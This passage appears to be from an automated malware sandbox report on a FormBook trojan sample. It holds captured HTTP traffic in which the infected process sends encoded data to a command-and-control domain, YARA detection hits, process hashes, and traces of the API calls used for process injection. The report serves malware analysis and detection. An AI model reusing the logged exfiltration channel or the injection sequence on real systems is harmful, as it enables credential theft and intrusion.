                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                          Jul 1, 2024 15:12:38.777333975 CEST | 685 | IN
                          Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          13 | 192.168.2.4 | 49758 | 43.132.189.227 | 80 | 4320 | C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 1, 2024 15:12:44.166990995 CEST | 770 | OUT | POST /3mcu/ HTTP/1.1
                          Host: www.eylmpwjot.store
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.eylmpwjot.store
                          Content-Length: 204
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.eylmpwjot.store/3mcu/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: dBOL8fg=dd8gpdQzBijumU0T35qqKPCjjPara0MX8s/KU7VlzVDQ5nDqm52Pk7e9S3W5OAaWE5GpvBinDylzb6fYW6Jdy7JhRH+anReW7NmP/8NZgKpg568CAc2yFMbEw+Oj73YaSwWHfSGGXwKRgh/2/7NwG+JGLB+nX5wZtG9oRxfV5F6zJ6wqLIu+sPL7KQUY9kPCFQ==


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          14 | 192.168.2.4 | 49759 | 43.132.189.227 | 80 | 4320 | C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 1, 2024 15:12:46.704902887 CEST | 790 | OUT | POST /3mcu/ HTTP/1.1
                          Host: www.eylmpwjot.store
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.eylmpwjot.store
                          Content-Length: 224
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.eylmpwjot.store/3mcu/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                          Session ID:15
                          Source IP:192.168.2.4
                          Source Port:49760
                          Destination IP:43.132.189.227
                          Destination Port:80
                          PID:4320
                          Process:C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Timestamp:Jul 1, 2024 15:12:49.236515045 CEST
                          Bytes transferred:10872
                          Direction:OUT
                          Data:POST /3mcu/ HTTP/1.1
                          Host: www.eylmpwjot.store
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.eylmpwjot.store
                          Content-Length: 10304
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.eylmpwjot.store/3mcu/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                          Session ID:16
                          Source IP:192.168.2.4
                          Source Port:49761
                          Destination IP:43.132.189.227
                          Destination Port:80
                          PID:4320
                          Process:C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Timestamp:Jul 1, 2024 15:12:51.772454023 CEST
                          Bytes transferred:498
                          Direction:OUT
                          Data:GET /3mcu/?dBOL8fg=QfUAqqYGVyzbjiAj2dnUBJSNi+zHRF4Q6sDLQeB06Snd2Ev4mrer+JTsXVK5M0bFA+ayvTGmBhRWLdOOcrwm0o86bnORrWDNmfnIiMMD3+9d3oxlAeCDNso=&9Zed=oJfxPJMXK HTTP/1.1
                          Host: www.eylmpwjot.store
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-us
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36



                          Target ID:0
                          Start time:09:10:58
                          Start date:01/07/2024
                          Path:C:\Users\user\Desktop\indent PWS-020199.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\indent PWS-020199.exe"
                          Imagebase:0xff0000
                          File size:727'560 bytes
                          MD5 hash:66800CAE69C4278C8A33921D624B7528
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:2
                          Start time:09:11:00
                          Start date:01/07/2024
                          Path:C:\Users\user\Desktop\indent PWS-020199.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\indent PWS-020199.exe"
                          Imagebase:0x8f0000
                          File size:727'560 bytes
                          MD5 hash:66800CAE69C4278C8A33921D624B7528
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1974143333.0000000001360000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1974143333.0000000001360000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1975485544.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1975485544.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:low
                          Has exited:true

                          Target ID:4
                          Start time:09:11:22
                          Start date:01/07/2024
                          Path:C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe"
                          Imagebase:0x630000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2905770079.0000000002600000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2905770079.0000000002600000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:false

                          Target ID:7
                          Start time:09:11:23
                          Start date:01/07/2024
                          Path:C:\Windows\SysWOW64\netiougc.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\SysWOW64\netiougc.exe"
                          Imagebase:0x7d0000
                          File size:25'600 bytes
                          MD5 hash:DD8D09523CDB5610078DF64BA4889806
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:moderate
                          Has exited:false

                          Target ID:8
                          Start time:09:11:36
                          Start date:01/07/2024
                          Path:C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe"
                          Imagebase:0x630000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:10
                          Start time:09:11:53
                          Start date:01/07/2024
                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                          Imagebase:0x7ff6bf500000
                          File size:676'768 bytes
                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true


                            Execution Graph

                            Execution Coverage:11.3%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:240
                            Total number of Limit Nodes:18

                            Control-flow Graph

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: 6
                            • API String ID: 0-498629140
                            • Opcode ID: 542643368bcac6b707c5b89da82f8105d483679976807011ca6defec9f6d38a4
                            • Instruction ID: 36347247fd8face46b92f92d978a697f234b4c2846fe123fd9e4466fdbb64e17
                            • Opcode Fuzzy Hash: 542643368bcac6b707c5b89da82f8105d483679976807011ca6defec9f6d38a4
                            • Instruction Fuzzy Hash: A2328C70B012449FEB29DB79C990BAEB7F6AF89310F144469E5069B3A5DF38ED01CB50

                            Control-flow Graph

                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 033720F6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: b049f5eec021797fa36134a682cc3c17eb3ccaf394c976632f41b4deb4ea7681
                            • Instruction ID: 4bac197f6b55efc7a3f79139d5e0df38555c60ab2a9564ad5cb455865312774e
                            • Opcode Fuzzy Hash: b049f5eec021797fa36134a682cc3c17eb3ccaf394c976632f41b4deb4ea7681
                            • Instruction Fuzzy Hash: 6BA15E71D002599FDB24DF68CC81BDEBBB2BF48310F148669E818A7250DB789985CF91

                            Control-flow Graph

                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 033720F6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0

                            Control-flow Graph

                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 01A1B0DE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681247378.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1a10000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0

                            Control-flow Graph

                            Memory Dump Source
                            • Source File: 00000000.00000002.1681247378.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1a10000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:

                            Control-flow Graph

                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 01A159C9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681247378.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1a10000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0

                            Control-flow Graph

                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 01A159C9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681247378.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1a10000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0

                            Control-flow Graph

                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 03371CC8
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0

                            Control-flow Graph

                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 03371CC8
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0

                            Control-flow Graph

                            APIs
                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 03371DA8
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0

                            Control-flow Graph

                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01A1D726,?,?,?,?,?), ref: 01A1D7E7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681247378.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1a10000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0

                            Control-flow Graph

                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 03371B1E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 03371B1E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            APIs
                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 03371DA8
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01A1D726,?,?,?,?,?), ref: 01A1D7E7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681247378.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1a10000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 03371BE6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01A1B159,00000800,00000000,00000000), ref: 01A1B36A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681247378.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1a10000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 03371BE6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01A1B159,00000800,00000000,00000000), ref: 01A1B36A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681247378.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1a10000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 03374555
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 03374555
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 01A1B0DE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681247378.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1a10000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1680822429.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_167d000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000000.00000002.1680822429.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_167d000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000000.00000002.1680860020.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_168d000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000000.00000002.1680860020.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_168d000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000000.00000002.1680860020.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_168d000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c4082cedcc09d4f59000b94495f96b5c4d806f2a1250a848504d7460327abc09
                            • Instruction ID: ff2c92618ea8ec6a5eaa6375888f007572bb9c740604b33ae1e96c5e3c8dda79
                            • Opcode Fuzzy Hash: c4082cedcc09d4f59000b94495f96b5c4d806f2a1250a848504d7460327abc09
                            • Instruction Fuzzy Hash: 1621A175509380CFDB13DF64D990B15BF71EB45214F28C6DAD8498B2A7C33A940BCB62
                            Memory Dump Source
                            • Source File: 00000000.00000002.1680822429.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_167d000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                            • Instruction ID: dfb92cd267120060bb7f4a6b1d199495142bc60059c9f1de50c141b321dfa9f6
                            • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                            • Instruction Fuzzy Hash: C211E172404280CFDB12CF54D9C0B16BF71FF84324F24C6A9D9490B256C33AD45ACBA1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1680822429.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_167d000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                            • Instruction ID: fad51b958d032f61a62bc36494229949ccbfed8cf6aed11f0f2a941acde9633d
                            • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                            • Instruction Fuzzy Hash: 6211DC72404280DFDB12CF44D9C0B56BF72FB84324F24C6A9D9090B25AC33AE45ACBA2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1680860020.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_168d000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                            • Instruction ID: def710f67b7596293dc61f112e5b5ecdf759079c130b09ae352a7e6edc573d7b
                            • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                            • Instruction Fuzzy Hash: 7411BB75544280DFDB12DF58C9D0B15BBB1FB84324F24C6A9D9494B396C33AD40ACB61
                            Memory Dump Source
                            • Source File: 00000000.00000002.1680822429.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_167d000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c27e56255e5e7f7bbbf58936ff6e44b59c817395391ccc57db96694f4f790660
                            • Instruction ID: 5a0523fe7875645370851ff8220294cf4ab685f6f4d72added221fe5407ef84d
                            • Opcode Fuzzy Hash: c27e56255e5e7f7bbbf58936ff6e44b59c817395391ccc57db96694f4f790660
                            • Instruction Fuzzy Hash: C801A7711043849AE7219A9ACC84B76FFA8EF45720F188D1AED094E386D3799841C671
                            Memory Dump Source
                            • Source File: 00000000.00000002.1680822429.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_167d000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d166d39be1ed9aab3da4f1a5058f3b074fc9e6101c4728ea6f9613c349d0d8bd
                            • Instruction ID: c89c38b81b1b6ed30ba0985afc25874ab344777cfd612517f8c607d854977da2
